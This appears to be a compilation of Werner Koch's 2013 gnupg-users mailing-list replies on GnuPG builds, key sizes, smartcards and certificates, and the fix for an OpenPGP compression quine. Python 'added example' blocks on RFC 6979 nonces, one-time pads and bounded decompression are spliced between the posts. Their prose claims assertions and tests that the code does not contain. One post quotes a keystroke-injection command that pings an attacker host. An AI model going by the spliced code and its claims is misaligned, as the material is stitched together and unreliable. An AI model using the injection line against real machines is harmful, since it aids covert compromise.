Re: GnuPG 2.0.22 compiling on Mac OS X fails
On Sat, 5 Oct 2013 14:58, so...@dersonic.org said:

> i just tried to compile the 2.0.22 version on Mac OS X 10.8.5 with XCode 5.0.

This is known. See for example bug 1541. Sorry, I can't do anything about it until someone provides a tested solution.

> signal.c:125:41: warning: adding 'int' to a string does not append to the string [-Wstring-plus-int]
>       write (2, "0123456789"+(value/i), 1);
>                             ^~
> signal.c:125:41: note: use array indexing to silence this warning

Surely, it does not. Syntactic sugar is required to drink from this source - stupid warning.

Salam-Shalom,

   Werner

--
Die Gedanken sind frei.  Ausnahmen regelt ein Bundesgesetz.

___
Gnupg-users mailing list
Gnupg-users@gnupg.org
http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: [Announce] [security fix] GnuPG 1.4.15 released
On Sun, 6 Oct 2013 23:30, joh...@vulcan.xs4all.nl said:

> The README in the source bzip2 file still states 1.4.14.

Ah well, I should not have mentioned the exact version number there.

Shalom-Salam,

   Werner
Re: New GPLv3 OpenPGP card implementation (on a java card).
On Tue, 15 Oct 2013 11:41, p...@heypete.com said:

> Also, are there any smartcards out there that would support DSA/ELG keys? All the cards I've seen and used support RSA only.

You don't want DSA on smartcards - at least not until they are able to do deterministic DSA (RFC 6979).

ECC on smartcards has been available for a very long time because that used to be the only method to do pubkey crypto with reasonable performance on cards without a hardware exponentiation circuit. The ZeitControl cards have support for some NIST curves but it is not yet supported by the OpenPGP card application. I am not sure whether it is a good idea to go with the NIST curves because ECDSA suffers from the same problem as DSA.

What about trying to implement Ed25519 on a Java card?

Salam-Shalom,

   Werner
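The deterministic nonce derivation Werner points to (RFC 6979) is what removes the dependence of a DSA/ECDSA signature on the quality of the card's random number generator: the per-signature value k is derived from the private key and the message hash with HMAC-DRBG, so the same key and message always yield the same k, and no two different messages share one. The following is an added example, not code from the thread or from GnuPG; it implements the RFC 6979 section 3.2 procedure in Python. The group order used below is the order of the NIST P-256 curve (a published constant); the private key and messages are constructed test values, so the assertions check the properties that matter (determinism, range, distinctness) rather than a fixed output. To validate an implementation against known answers, use the test vectors in appendix A of the RFC.

```python
"""RFC 6979 deterministic nonce (k) generation, added example.
Follows section 3.2 of the RFC: HMAC-DRBG seeded with int2octets(x) ||
bits2octets(H(m)), then candidates are drawn until one lies in [1, q-1]."""
import hashlib
import hmac


def _bits2int(b: bytes, qlen: int) -> int:
    """Leftmost qlen bits of b as an integer (RFC 6979 section 2.3.2)."""
    x = int.from_bytes(b, "big")
    blen = len(b) * 8
    return x >> (blen - qlen) if blen > qlen else x


def _int2octets(x: int, rolen: int) -> bytes:
    """Big-endian encoding of x in rolen bytes (section 2.3.3)."""
    return x.to_bytes(rolen, "big")


def _bits2octets(b: bytes, q: int, qlen: int, rolen: int) -> bytes:
    """bits2int(b) reduced mod q, then encoded (section 2.3.4)."""
    return _int2octets(_bits2int(b, qlen) % q, rolen)


def deterministic_nonce(q: int, x: int, message: bytes, hash_name: str = "sha256") -> int:
    """Return k in [1, q-1] derived deterministically from (x, H(message))."""
    if not 1 <= x < q:
        raise ValueError("private key out of range")
    h = getattr(hashlib, hash_name)
    hlen = h().digest_size
    qlen = q.bit_length()
    rolen = (qlen + 7) // 8
    h1 = h(message).digest()
    seed = _int2octets(x, rolen) + _bits2octets(h1, q, qlen, rolen)

    # Steps b-g: initialise the HMAC-DRBG state (V, K).
    V = b"\x01" * hlen
    K = b"\x00" * hlen
    K = hmac.new(K, V + b"\x00" + seed, h).digest()
    V = hmac.new(K, V, h).digest()
    K = hmac.new(K, V + b"\x01" + seed, h).digest()
    V = hmac.new(K, V, h).digest()

    # Step h: generate candidates until one is a valid nonce.
    while True:
        T = b""
        while len(T) * 8 < qlen:
            V = hmac.new(K, V, h).digest()
            T += V
        k = _bits2int(T, qlen)
        if 1 <= k < q:
            return k
        # Candidate rejected: update state and try again.
        K = hmac.new(K, V + b"\x00", h).digest()
        V = hmac.new(K, V, h).digest()


# Order of the NIST P-256 group (published constant), usable as q for ECDSA.
P256_ORDER = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551

# Constructed private key for the example; not a real key.
EXAMPLE_PRIVATE_KEY = 0x1234567890ABCDEF1234567890ABCDEF1234567890ABCDEF1234567890ABCDE


def nonce_is_stable(q: int, x: int, message: bytes) -> bool:
    """Signing the same message twice must derive the same k."""
    return deterministic_nonce(q, x, message) == deterministic_nonce(q, x, message)


if __name__ == "__main__":
    k = deterministic_nonce(P256_ORDER, EXAMPLE_PRIVATE_KEY, b"sample")
    print(hex(k))
```

The check a card or library implementer wants is in `nonce_is_stable`: two signatures over the same message must agree on k, and, as the test also asserts, a change of either the message or the key must change k.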
Re: Smart card reader security
On Thu, 17 Oct 2013 17:55, christian.we...@gmail.com said:

> I bought a cyberJack go [1] to use it with my openPGP smart card for authentification. Since the firmware of that device is upgradeable and is capable of saving at least 2 GB of data, how can I be sure it is not a

This is not just a reader but an identification token with lots of embedded and upgradable software. It has already been shown that such smart card readers are fun to play with. IIRC, there have been demonstrations turning the doctors' health card terminals and PIN+chip terminals into space invaders consoles.

Salam-Shalom,

   Werner
Re: Differences in --list-packets between 1.4 and 2.0
On Thu, 17 Oct 2013 21:26, r...@sixdemonbag.org said:

> Is there any way to make GnuPG 1.4 behave like 2.0 in this regard?

Yes. See commit 0bdf121 which will be included into 1.4.16.

Shalom-Salam,

   Werner
Re: Building pinentry on Windows 7
On Tue, 22 Oct 2013 14:06, nikola.radovano...@seavus.com said:

> I couldn't find any manual for building pinentry executables for Windows (specifically Windows 7/8). Also for Gpg4Win 2 in general. I

The easiest way to do this is to follow the README of the gpg4win installer source. It is best to use a decent Debian system. Although the configure script of the installer checks for required software, some checks are missing and you may run into errors if you have not installed, for example, the transfig package. Let us know what you had to install so we can add the checks.

If you just want to build pinentry, you download the tarball and

  mkdir ~/w32root
  cd somewhere
  tar xjvf pinentry-0.8.3.tar.bz2
  cd pinentry-0.8.3
  ./autogen.sh --build-w32
  make
  make install
  cp ~/w32root/bin/pinentry-*.exe /cifs/windows7-box/.../../

However, unless you only want the really ugly native pinentry you need to install lots of libraries first. Thus using the gpg4win installer framework is easier.

Shalom-Salam,

   Werner
Re: Building Pinentry for Windows
On Fri, 25 Oct 2013 13:53, nikola.radovano...@seavus.com said:

> Right now, by building the whole gpg4win i have succeeded in what i wanted, but i will certainly try again with MXE to see what is the problem there.

I am glad to hear that. I will add some more tests to the installer.

Just for the records: It is strongly suggested to use the gpg4win installer framework or (if necessary) the related ./autogen.sh --build-32 method for building GnuPG and related stuff for Windows. The reason for this suggestion is that we can't maintain the set of required options and dependencies in all kinds of frameworks. I also don't want to follow up on bugs due to the use of other build systems. The reported problems with the OSX Homebrew build systems are an example of such events.

Shalom-Salam,

   Werner
Re: none
On Thu, 24 Oct 2013 20:49, nikola.radovano...@seavus.com said:

> 1) When trying to build whole Gpg4Win i ran into several problems. Package for gtkhtmlviewer2 couldn't be found, but i have

Unfortunately this kind of problem happens from time to time. You may delete the claws-mail tar package from the packages directory to avoid all the Claws dependencies.

> (instead plugins) on a target url. Then stow was not installed on a system, and i have installed it with apt-get install stow. But

Configure should have listed stow as missing, or am I wrong.

> makensis, which is missing, must be installed also. And it cannot be

Under Debian the package is nsis.

> installed with apt-get. It requires python, scons, zlib and gcc to be installed already, so it is a more complicated process. Werner, if you

Sure, that is due to NSIS? If so it would be a Debian packaging bug.

Salam-Shalom,

   Werner
Re: 2048 or 4096 for new keys? aka defaults vs. Debian
On Sat, 26 Oct 2013 11:35, b...@beuc.net said:

> Plus, following this principle, why doesn't gnupg default to 4096 if there isn't any reason not to? I would suppose that if gnupg defaults

4k primary RSA keys increase the size of the signatures and thus make the keyrings longer and, worse, computing the web of trust takes much longer. Yeah, not on your high end desktop machine but on old laptops and my N900 phone. It also drains the battery faster.

There is no benefit of overly large keys on average computers. After all the goal is not to have large keys but to protect something. Now, if you want to protect something you need to think like the attacker - what will an attacker do to get the plaintext (or fake a signature)? Spend millions on breaking a few 2k keys (assuming this is at all possible within the next decade) or buy/develop/use a zero-day?

Instead of discussing these numbers the time could be much better used to audit the used software (firmware, OS, libs, apps).

Salam-Shalom,

   Werner

p.s. I would even consider bugs like below more serious than protecting against breaking 2k RSA.

  commit a7a9cdcaaf3979baa18dad51e722882581349f45
  Author: Werner Koch <w...@gnupg.org>
  Date:   Sat Sep 7 10:06:46 2013 +0200

      Fix bug in _gcry_mpi_tdiv_q_2exp.

      * mpi/mpi-internal.h (MPN_COPY_INCR): Make it work.
      --
      This bug has been with us since the version 0.0.0 of GnuPG.
      Fortunately it only affects an optimized code path which is rarely
      used in practice: If the shift size matches the size of a limb
      (i.e. 32 or 64); this is is_prime in primegen.c.  Over there the
      Rabin-Miller test may fail with a probability of 2^-31 (that is if
      the to be tested prime - 1 has the low 32 bits cleared).  In
      practice the probability is even much less because we first do a
      Fermat test on the randomly generated candidates which sorts out
      the majority of composite numbers.

      The bug in MPN_COPY_INCR was found by Sven Bjorn.
Re: gpgsm and expired certificates
On Sat, 26 Oct 2013 12:02, o...@mat.ucm.es said:

> Can gpgsm deal with this situation?

Sure. That is a very common situation. Although I am myself not using gpgsm for mail encryption, I use it to maintain all kinds of X.509 certificates.

FWIW, gpgsm passed several conformance tests with quite good results [1] and was recently approved for secret communication (at Germany's entry level VS/NfD).

Salam-Shalom,

   Werner

[1] Watch out for Aegypten, which included GnuPG, in https://www.bsi.bund.de/DE/Themen/weitereThemen/VerwaltungsPKIVPKI/Interoperabilitaetstest/Testberichte/testberichte_node.html
Re: 2048 or 4096 for new keys? aka defaults vs. Debian [doc patch]
On Sun, 27 Oct 2013 00:29, r...@sixdemonbag.org said:

> Hi! I'm the quasi-official FAQ maintainer. You can read the current text of the FAQ at:

While we are at it. What about making it the official one, i.e. change the licenses to CC-by-sa/GPL? Given the importance of a FAQ I think we should no longer delay it - even if old links to certain questions won't work any longer.

Salam-Shalom,

   Werner
Re: gpgsm and expired certificates
On Sat, 26 Oct 2013 22:03, o...@mat.ucm.es said:

> know by the date of the certificate which certificate to use for which message?
> - old for old messages

Note that there is no need for a certificate for decryption - only the private key is required. The certificate is only used to show some meta information.

> - the new for the new messages

Expired certificates are not used and thus a now valid one will be used.

Shalom-Salam,

   Werner
Re: gpgsm and expired certificates
On Sun, 27 Oct 2013 10:23, p...@heypete.com said:

> Correct, though it is possible (but usually recommended against) to create a new certificate using the same private keypair as before. In

The business model of most CAs is to sell you a subscription by setting the expiration time very low so that they can ask after a year for another fee to create a new certificate. Here it does not make sense to create a new private key every year. GnuPG basically does the same by allowing you to prolong the expiration time.

> I interpreted Werner's comment to mean "In order to decrypt messages encrypted to you, you only need a private key. You don't need a valid certificate to decrypt old messages that were encrypted to a now-expired certificate."

Correct.

Shalom-Salam,

   Werner
Re: 2048 or 4096 for new keys? aka defaults vs. Debian
On Sun, 27 Oct 2013 12:15, joh...@vulcan.xs4all.nl said:

> ElGamal/DSA to RSA after the RSA patent expired? Does RSA have any advantages over ElGamal/DSA? The only one I can think of is less

It is in general faster and there are OpenPGP implementations which only support RSA (despite that the standard requires DSA and Elgamal). The drawback is that RSA signatures are larger than those made with DSA. IIRC, we discussed that back then and you may find something in the mailing list archives.

Salam-Shalom,

   Werner
Re: 2048 or 4096 for new keys? aka defaults vs. Debian
On Sun, 27 Oct 2013 17:47, gn...@oneiroi.net said:

> Numbers please? Or are you talking about personal/subjective impressions?

What about you running some benchmarks for us? Let's say: a 4k RSA key signed by 90 other 4k RSA keys, 8 2k RSA keys, and one 8k RSA key. For security reasons key signature caching has been disabled (--no-sig-cache) because you obviously can't accept that in this high security theater. Run encryption+signature tests for 2 recipients out of the set of these 100 keys. Compare that to a set of 2k keys with only one 4k key. Run these tests again on an average netbook.

Shalom-Salam,

   Werner

p.s. Once I did tests with off-the-shelf smartcards. Signing a mail with a 1k RSA key using these smartcards took more than one second - it was barely unusable for everyday mail processing. Only when we moved to our own smartcards (the old AVR based 1k RSA keys) was using a smartcard actually usable (100ms). You don't want to wait 10 seconds to decrypt a thread of 10 mails just to notice that it was only CCed office chitchat.
Re: 2048 or 4096 for new keys? aka defaults vs. Debian
On Sun, 27 Oct 2013 21:28, gn...@oneiroi.net said:

> I don't think 1 second threshold is real no-go here. I would say you have quite high requirements. Also some MUAs can contribute to such

Start working with encrypted mails and slow smartcards on a regular basis and you would soon see what I mean. Communicating with recipients with some of them using --throw-keyids (i.e. lots of trial decryption) will immediately show what I mean.

Shalom-Salam,

   Werner
Re: Why trust gpg4win?
On Tue, 10 Sep 2013 15:18, ndk.cla...@gmail.com said:

>> way to connect about anything to a computer. Emulated keyboard which sends ANSI control codes to take over your box without you noticing?
>
> Uh? Without you noticing? For sure you know more than me, but to my knowledge an USB keyboard only sends key scan-codes (not ANSI sequences, that's why you need to set the keyboard language). And if you have an

And those key strokes may for example represent "Alt-F2 ping -c1 SOMEHOST; exit" and the attacker will know the time you inserted the USB stick. Now start doing some real thing.

> Pete proposed to use an USB-to-Serial interface to avoid attacks against the USB stack on the PC. Why should an AVR be used to implement a flash device?

Because you wrote the USB stack and thus it is trustworthy. Implementing a backdoor in the AVR proper to detect the use of such a free software USB stack and subvert it would be much harder than to implement something into a closed source USB stack.

Salam-Shalom,

   Werner
Re: Public algos list
On Tue, 29 Oct 2013 14:18, fabio.coa...@gmail.com said:

> The part that I don't understand is the two question marks in pubkey algos.
>
> Pubkey: RSA, ELG, DSA, ?, ?

Sorry for that buglet. That extra output ("?, ?") is due to a change in preparation of ECC support. It is already fixed in the repository.

Shalom-Salam,

   Werner
Re: Issues while decrypting
On Tue, 29 Oct 2013 14:05, tahirind...@yahoo.com said:

> I am facing a strange issue while decrypting a file in GPG. I get an error from command line, as
>
>   gpg: [dont know]: Invalid packet (ctb=6b).
>
> I didn't find any reference to this issue in the past. Please help

The input data is corrupt or not OpenPGP data.

Shalom-Salam,

   Werner
Re: The symmetric ciphers
On Wed, 30 Oct 2013 20:25, p...@spth.de said:

> If we have plenty of randomness available, we could do this a

Entropy (which should be at the core of every CRNG) is a scarce resource. Thus a one time pad is not going to work because you need true random at the same size of the message.

> XOR the message M with a random one-time pad P to obtain N. Encrypt P with A, and N with B.

The drawback is that this doubles the length of the message. And that you need a way to securely convey the OTP to the recipient. The Soviets had severe problems to do that during WWII and later and resorted to double use of the one time pads. That was one of the origins of the UKUSA alliance aiming and succeeding at breaking their messages (project VENONA).

Shalom-Salam,

   Werner
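The construction quoted above, M XOR P = N with P and N carried separately, and the two costs Werner names (the doubled size, and the fatal consequence of "double use" of a pad), as an added Python example that is not part of the thread. The outer encryption of P with cipher A and of N with cipher B is left out, since the point here is the pad layer; the `PadBook` class models the pre-shared pad book both parties hold, and its refusal to hand out a serial twice is the control that would have prevented the VENONA failure. All pad contents and messages below are constructed.

```python
"""One-time-pad split of a message, added example.
split: N = M XOR P; join: M = N XOR P. A pre-shared PadBook enforces
single use of every pad, and reuse_leak shows what a reused pad exposes."""
import secrets


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """Bytewise XOR; both inputs must be the same length (pad == message)."""
    if len(a) != len(b):
        raise ValueError("pad and message must have equal length")
    return bytes(x ^ y for x, y in zip(a, b))


class PadBook:
    """A book of pre-shared pads indexed by serial number. Sender and
    recipient hold identical copies; each serial may be consumed once."""

    def __init__(self, pages: dict):
        self._pages = dict(pages)
        self._used = set()

    @classmethod
    def generate(cls, count: int, length: int) -> "PadBook":
        # Fresh true-random pages; this is the scarce entropy Werner mentions.
        return cls({serial: secrets.token_bytes(length) for serial in range(count)})

    def copy(self) -> "PadBook":
        """The recipient's identical copy of the book (constructed helper)."""
        return PadBook(self._pages)

    def consume(self, serial: int) -> bytes:
        """Return pad `serial` and mark it spent; refuse any second use."""
        if serial in self._used:
            raise RuntimeError(f"pad {serial} already used; reuse breaks the OTP")
        self._used.add(serial)
        return self._pages[serial]


def split(book: PadBook, serial: int, message: bytes) -> tuple:
    """Sender side: returns (serial, N) with N = M XOR P."""
    pad = book.consume(serial)
    return serial, xor_bytes(message, pad)


def join(book: PadBook, serial: int, masked: bytes) -> bytes:
    """Recipient side: M = N XOR P, consuming the same serial from its copy."""
    return xor_bytes(masked, book.consume(serial))


def transmitted_size(message: bytes) -> int:
    """The doubling Werner points out: P and N each have the length of M."""
    return 2 * len(message)


def reuse_leak(masked1: bytes, masked2: bytes) -> bytes:
    """If one pad P masked two messages, P cancels out of N1 XOR N2 and the
    result equals M1 XOR M2: the pad no longer hides the plaintexts'
    relationship. This is why PadBook.consume refuses a second use."""
    return xor_bytes(masked1, masked2)


if __name__ == "__main__":
    sender = PadBook.generate(count=4, length=16)
    recipient = sender.copy()
    serial, n = split(sender, 0, b"constructed text")
    print(join(recipient, serial, n))
```

The design point is where the control lives: `PadBook.consume` raises on the sender's side before a second message can ever be masked with an already-used page, because once two such ciphertexts exist the leak in `reuse_leak` is unconditional.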
Re: The symmetric ciphers
On Wed, 30 Oct 2013 18:06, p...@spth.de said:

> I wouldn't assume that: RSA is something taught in typical maths and computer science curriculums at universities. Factorization is a well-known problem.

Using RSA in a safe way is not easy - it took more than 20 years until most cryptographers were convinced that there are safe ways of using RSA. Check out the notes section in the HAC on attacks on RSA.

Salam-Shalom,

   Werner
Re: make gpg-agent forget the PIN
On Fri, 1 Nov 2013 20:17, pe...@digitalbrains.com said:

> It's called 'scforget' here.

Or better: pull off the card and take it with you.

Shalom-Salam,

   Werner
[Announce] Details on the GnuPG 1.4.15 and 2.0.22 release
Hi!

Taylor asked me to forward this background info:

On Sat, 5 Oct 2013 10:56, w...@gnupg.org said:

> not yet been seen in the wild. Details of the attack will eventually be published by its inventor.

The zlib compression language that OpenPGP uses is powerful enough to express an OpenPGP compression quine -- that is, an OpenPGP compressed data packet that decompresses to itself -- causing infinite nesting of OpenPGP packets. Source code to generate such a quine is at http://mumble.net/~campbell/misc/pgp-quine/.

When fed the quine, older versions of GnuPG would blow the stack and crash. GnuPG 1.4.15 and GnuPG 2.0.22 avoid this by setting a small constant bound on the depth of packet nesting.

(This is similar to Tavis Ormandy's IPcomp compression quine, reported in CVE-2011-1547, which I didn't know about at the time I made the OpenPGP compression quine. Both of us had read Russ Cox's article on zlib compression quines: http://research.swtch.com/zip.)

Salam-Shalom,

   Werner

___
Gnupg-announce mailing list
gnupg-annou...@gnupg.org
http://lists.gnupg.org/mailman/listinfo/gnupg-announce
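The fix described above is a constant bound on nesting depth: a reader that recurses into each compressed packet needs a depth counter so that self-reproducing or merely deeply nested input terminates with an error instead of exhausting the stack. The following is an added example, not GnuPG's code, written in Python against a constructed container format (a `Z` tag byte followed by a zlib stream) so it runs offline; OpenPGP's real packet headers are not modelled. It also bounds the inflated size of each layer, which is the companion check against a layer that expands to far more than its encoded size. The depth constant `MAX_NESTING` and the tag byte are assumptions of this example.

```python
"""Depth-bounded and size-bounded unwrapping of nested compressed data,
added example. Mirrors the mitigation in the announcement: a small constant
limit on how deep compressed containers may nest."""
import zlib

MAX_NESTING = 8          # constructed small constant bound on nesting depth
MAX_LAYER_OUTPUT = 1 << 20  # constructed cap on bytes one layer may inflate to
TAG = b"Z"               # constructed tag byte marking a compressed container


class NestingTooDeep(Exception):
    pass


class LayerTooLarge(Exception):
    pass


def make_nested(payload: bytes, levels: int) -> bytes:
    """Test-input builder: wrap payload in `levels` compressed containers."""
    data = payload
    for _ in range(levels):
        data = TAG + zlib.compress(data)
    return data


def inflate_bounded(stream: bytes, max_out: int) -> bytes:
    """Inflate one zlib stream, refusing to produce more than max_out bytes.
    decompressobj stops at max_length; if the stream did not finish by then,
    the layer is larger than allowed (or truncated) and is rejected."""
    d = zlib.decompressobj()
    out = d.decompress(stream, max_out)
    if not d.eof:
        raise LayerTooLarge(f"layer inflates beyond {max_out} bytes or is incomplete")
    return out


def unwrap(data: bytes, depth: int = 0, max_depth: int = MAX_NESTING,
           max_out: int = MAX_LAYER_OUTPUT) -> bytes:
    """Recursively unwrap containers, as a packet parser would recurse into
    compressed packets, but stop once `max_depth` layers have been opened."""
    if not data.startswith(TAG):
        return data                      # literal data: recursion ends
    if depth >= max_depth:
        raise NestingTooDeep(f"more than {max_depth} nested compressed layers")
    inner = inflate_bounded(data[len(TAG):], max_out)
    return unwrap(inner, depth + 1, max_depth, max_out)


if __name__ == "__main__":
    print(unwrap(make_nested(b"constructed payload", 3)))
    try:
        unwrap(make_nested(b"x", MAX_NESTING + 1))
    except NestingTooDeep as e:
        print("rejected:", e)
```

Without the depth check, a quine-style input would make `unwrap` call itself until the interpreter's recursion limit (or a C implementation's stack) gave out; with it, the failure is a clean, catchable error after at most `MAX_NESTING` layers, whatever the input contains.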
Re: bug-like: strange behaviour of addrevoker
On Tue, 5 Nov 2013 23:13, mailinglis...@hauke-laging.de said:

> revokers. But that didn't work as expected. After entering the command addrevoker I was asked to enter the user ID of the respective key. Why the user ID and not the key ID or fingerprint? Does that make any sense?

You may use any way to specify a user id. It is the same code as used when you fire up gpg --key-edit USERID with the only restriction that the key must have certify capability which is always the case for a primary key.

> nor 0x1a571df5 works. Even worse: The email address doesn't work either (both ha...@laging.de and ha...@laging.de).

If you have the two user IDs, gpg can't decide which to use. Thus you need to use the keyid or the fingerprint. Please check again and if you can't make it work, please create a test case for us.

Shalom-Salam,

   Werner
Re: Smart card reader security
On Sat, 23 Nov 2013 17:19, nb.li...@xandea.de said:

>> smart card readers are fun to play with. IIRC, there have been demonstrations turning the doctors' health card terminals and PIN+chip terminals into space invaders consoles.
>
> Do you have a source for that? I'd love to see some video or so :)

Sorry, I have not the time to dig into this. A good starting point will be http://www.cl.cam.ac.uk/research/security/banking/.

Salam-Shalom,

   Werner
Re: IMporting PGP public key into GPG 1.4.2 with no expiry shows as expired in GPG
On Mon, 2 Dec 2013 19:25, ctsonet...@yahoo.com said:

> When I import a PGP public key that has NO expiry date, into GPG 1.4.2, it s

1.4.2 is quite old (8 years) and you should definitely not use it anymore.

It seems that you did not invoke gpg correctly. Please show us the actual command line you used and also the content of gpg.conf. You may redact keyids and user ids but please change only digits to '1' and letters to 'a' - do not redact blanks etc.

Salam-Shalom,

   Werner
Re: Much slower than other block cipher implementations?
On Thu, 5 Dec 2013 03:41, cai.0...@gmail.com said:

> As far as I know, only GnuPG 2.0.x on x86 environments supports AES-NI.

Right. In addition you can't compare it with a simple block cipher as implemented by OpenSSL. OpenPGP does a lot more: It hashes the text to create a signature (which most users do). A kind of MAC is computed to detect manipulations of the ciphertext. The data is compressed. The data is split up into parts so that you do not have an optimal alignment. GnuPG may decide to use the slow 3DES algorithm (unlikely these days) and in general it has never been optimized for highest speed.

Shalom-Salam,

   Werner
Re: Any future for the Crypto Stick?
On Thu, 5 Dec 2013 21:14, ein...@pvv.org said:

> Gemalto SIM USB adapter seems to be sort of the same thing as the Crypto Stick. However, it is a bit more hassle to get a USB adapter and a smart card, cut the card to fit etc.

That is not a problem. You can buy pre-punched standard OpenPGP cards: it takes less than 10 seconds to break the ID000 sized part out and put it into one of the USB stick readers (I am using an SCT2512).

Shalom-Salam,

   Werner
Re: Promoting the usage of OpenPGP
On Thu, 5 Dec 2013 21:38, kloec...@kde.org said:

> S/MIME) for email as transparent to the users as possible. Ideally, the users wouldn't even have to notice that they are communicating via encrypted email.

100% agreement here.

> Unfortunately, I think email is a lost cause because there are so many different mail clients that will never support encryption. I think we

Please name those email clients. I am not aware of any mainstream mail client without encryption support (yes, Notes, but that is not mainstream). The real problem are webmailers.

> have a much better chance to replace email with something new that has end-to-end encryption (and probably also authentication) built in than we have to fix email.

There are some groups proposing this for some time now. A few of them have an obvious business case for their new system. However, mail will stay with us because everything works by mail. Mail has replaced letters, folders and file cabinets. You can't replace that with an online communication system, much as it is not possible to replace documents with a phone call. Mail is not done for the communication but for documenting transactions. A business needs to retain most of its communication for 10 years and more. In Germany you are even required to archive certain private mails for 2 years (invoices by craftsmen). The online media is by design not able to fulfill such requirements. Well, some are saying "you may send an attachment" using our system. But in this case you are back to standard mail with just a different transport layer (i.e. no RFC-821).

RFC-822 will stay with us and it is actually trivial to secure. Given that anonymity is very hard to impossible to achieve using the current internet infrastructure, I would also claim that SMTP will stay for the foreseeable future. STARTTLS is security wise not very different from https and has a chance to work reliably as soon as we have a working mechanism to replace PKIX.

Salam-Shalom,

   Werner
Re: Holiday giving (crowd-funding campaign?)
On Sat, 7 Dec 2013 07:31, pho...@panopticism.net said:

> Details were scarce, however. This sounds like perfect timing; perhaps either Sam or Werner can provide us with an update on the campaign?

Sam is preparing the campaign and twittering on https://twitter.com/gnupg . This campaign will be about a better website and easier accessible information on GnuPG. Sam already has some sketches for the new website, for example https://twitter.com/gnupg/status/408611650887905280

GnuPG has for too long been a tool like sendmail/exim/postfix but deserves more user attention. This is what we want to change.

In the course of the preparation, Sam convinced me that we need Twitter and even web site statistics. I have done the latter only the first two years of running GnuPG but stopped that for privacy reasons. Now we installed Piwik and people with JS enabled are tracked by us. Of course this is pseudo-anonymized and we won't hand out the raw data to anyone outside of g10 code.

Piwik gives some interesting insights, for example most direct visits to gpg4win.org come from gnupg.org. Aside from the usual Google triggered visits, lifehacker.com and philzimmermann.com are top listed referrers for gnupg.org. gnupg.org has 2000 to 3000 visits a day, gpg4win.org 1500 to 2500.

Salam-Shalom,

   Werner
Re: Any future for the Crypto Stick?
On Sat, 7 Dec 2013 11:29, ein...@pvv.org said:

> AFAIK, the US has no import restrictions on cryptography, and the RSA patent ran out years ago, so e.g. shop.kernelconcepts.de should be able to ship it to you.

IIRC, Petra of kernelconcepts told me that there is no problem for them to ship to the US. You may also order by simple or encrypted mail (Petra's fingerprint is on their website); the shop is merely an email frontend to them.

Shalom-Salam,

   Werner
Re: Promoting the usage of OpenPGP
On Mon, 9 Dec 2013 20:36, kloec...@kde.org said:

> Exactly. Webmailers was what I was thinking about. And probably mail clients used on mobile devices. I don't know how many of those support encryption.

Well, Kontact for N900 and Windows Mobile 6.5 has very good support (as long as you carry an extra spare battery with you);-) The guardianproject is working hard on providing support for Android and there are a couple of other projects for encryption on mobiles. My fingers are too clumsy to even think about regularly sending or reading mails on a mobile phone (okay, a tablet might be more useful).

>> possible to replace documents with a phone call. Mail is not done for the communication but for documenting transactions.
>
> Where? AFAIK, in Germany, we still have to send faxes or registered letters with reply advice because email is not approved. (Well, maybe

Since about two years we are even able to send invoices by email without any signature (before that a qualified signature was required, but that never took up). For about everything you can do by plain letter you may also use email. In fact, if you have published an email address for your business you are required to read the email and archive them in the same way you do it with snails.

> What do you mean by online media? Is de-mail such an online medium?

Chat. In contrast to store and forward systems like email. No, de-mail is a store and forward system.

Shalom-Salam,

   Werner
Re: gpg-agent: pinentry-mode
On Wed, 11 Dec 2013 05:35, mailinglis...@hauke-laging.de said:

> That made me curious so I wanted to do just that but: That is the only occurrence of pinentry-mode in the man page...

Should have shown up in 2.0 - this is a 2.1 feature.

Salam-Shalom,

   Werner
Re: Git clone index-pack failed
On Thu, 12 Dec 2013 14:13, bernh...@intevation.de said:

> ... try again later. Check disc space. Check git version. Check if it works from the different machine/operating system/git repository.

Actually this is a remote problem. git.gnupg.org had a storage failure and thus remounted itself read-only. It is currently being worked on.

Shalom-Salam,

   Werner
Re: Git clone index-pack failed
On Thu, 12 Dec 2013 16:46, w...@gnupg.org said:

> Actually this is a remote problem. git.gnupg.org had a storage failure and thus remounted itself read-only. It is currently being worked on.

git.gnupg.org is now back. Sorry for the problems. I realized them too late.

Salam-Shalom,

   Werner
Another step towards crowdfunding
Hi,

you may want to check out http://blog.gnupg.org which has more info on the upcoming campaign.

Sorry for all that Javascript stuff.

Shalom-Salam,

   Werner
Re: show-uid-validity default to yes
On Thu, 12 Dec 2013 20:37, pe...@digitalbrains.com said:

> I think it's a good idea. It's a vital piece of information if you actually

The majority of users are using a GUI and thus the command line version does not matter at all. Although people should know better, I am pretty sure that there are many scripts out there which parse the human readable output. Such a change would break them.

Salam-Shalom,

   Werner
Re: Another step towards crowdfunding
On Fri, 13 Dec 2013 17:05, christophe.bro...@cnamts.fr said:
> * a very lean and clean GnuPG blog design :) and excellent promotional video !

I was somehow able to convince Sam not to install Wordpress like blogging software right now. Which also means that for comments you need to resort to gnupg-users ;-).

> One question : will STEED be in the scope of the upcoming crowdfunding campaign

No. A better communication platform will help us to gain more attention. If that works out, I hope to be able to help working on STEED without having to wonder how to feed my family the next month.

Salam-Shalom, Werner
Re: show-uid-validity default to yes
On Fri, 13 Dec 2013 17:04, pe...@digitalbrains.com said:
> Has it ever been researched in which way users use GnuPG? A part of the GUI users might also still use the command line for certain things.

My guess is that the majority of GnuPG users are not aware that they are using GnuPG. They see Enigmail, or GpgOL, or Mac tools. I even heard rumors that most sysadmins these days are preferring web based administration tools; so if sysadmins are using GUIs why should users prefer the command line. I estimate that not more than 1% of all GnuPG users are using gpg in the shell.

Right, the audience of this list is for the geeks - they know how to use mailing lists. Most users don't.

> Yes, but if you first say Avoid using the output of this command in scripts or other programs as it is likely to change as GnuPG changes and then still not make changes to the output because unthoughtful

I know. But part of the relative stability of the GPG interface is that even if we deprecate stuff we keep supporting it for a long, long time. I have suggested hundreds of times to better change a certain script to use --with-colons but I doubt that many followed that suggestion. After all it worked for them and why should they spend time changing a running system. It is indeed debatable whether this particular improvement is worth it. Better add a hint to the FAQ.

Shalom-Salam, Werner
Re: show-uid-validity default to yes
On Fri, 13 Dec 2013 21:05, mailinglis...@hauke-laging.de said:
> Maybe. But it is trivial to check whether gpg runs as part of a script, isn't it? It already does so today. I have forgotten where it is done but some

Huh? It is impossible without using a lot of heuristics and knowledge of the environment. You mean the isatty thing? Think about expect(1).

> future versions of 1.4 or 2.0 but for 2.1 only. There have been output format changes from 1.4.x to 2.0.x, too.

Not that I can remember right now (unless you mean --fixed-list-mode).

